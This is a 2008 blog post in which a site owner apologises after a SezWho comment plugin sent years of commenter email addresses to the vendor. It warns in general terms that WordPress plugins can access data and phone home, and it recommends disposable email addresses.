Email addresses mined from Thudfactor

April 22, 2008

If you are a commenter here, I owe you an apology. Yesterday I integrated the SezWho comment plugin which allows comment and reputation-tracking across weblogs. I assumed that only registered users of SezWho would be subject to this tracking. That assumption was incorrect.

When I activated the plugin, it transmitted six years worth of unencrypted commenter email addresses back to the SezWho main database so the SezWho application could begin to build a comment-dossier on those addresses.

In my programming career there have been several grand Ooops moments. There was the time I dumped a month’s worth of vitally important submitted document commentary for a major association’s big meeting. There was the time I accidentally spammed Capitol Hill. And then there was this moment.

I immediately contacted SezWho’s developers who have spent some time with me explaining how the system works. They have agreed to remove all Thudfactor-related content from their database, and I take them at their word on this. People who are mining addresses for nefarious spammy purposes don’t have working email addresses, much less trade email back and forth on application internals. I really think they are just plugin developers trying to solve a tricky problem and provide a valuable service.

They didn’t have to offer to remove the data or even respond to my email message. So I believe they are coding in good faith and aren’t going to go around and sell mailing lists behind my back.

But that’s only my impression, and it would have been much better to not have to rely on the kindness of strangers.

The moral of the story

The moral of the story is different if you are a site owner or just a commenter. I should have been more careful about installing this plugin. Apparently any plugin can access the database tables and phone home without any warning from Wordpress itself. In this case it was a plugin that explicitly collected and matched data on commenters, but it could just as easily have been something innocuous like a “random image” plugin. Indeed, plugins with injected malicious code have started turning up a number of places — usually someone else’s plugin with the evil code injected. The site 5ThirtyOne suggests you download your plugins from the original author’s web site but this will not necessarily protect you if the author him or herself is the person injecting the code. In this case the intent was not malicious, but it easily could have been.

For commenters, it’s a good reminder that you should have a disposable public address (or several) for spreading around and a private address for trusted communication. I know many of you already do this. But yes, every site you use your email address on is another chance for your address to be lifted. Even years after your last interaction.

And, unfortunately, even here at Thudfactor.

The plugin itself has been disabled and I want to re-iterate that SezWho says they are cleaning the database of the content I inadvertently sent them yesterday. I’m sorry, and I’ll do my best to start thinking of my database as a valuable collection of personal data rather than just my hobby.

Posted in Technology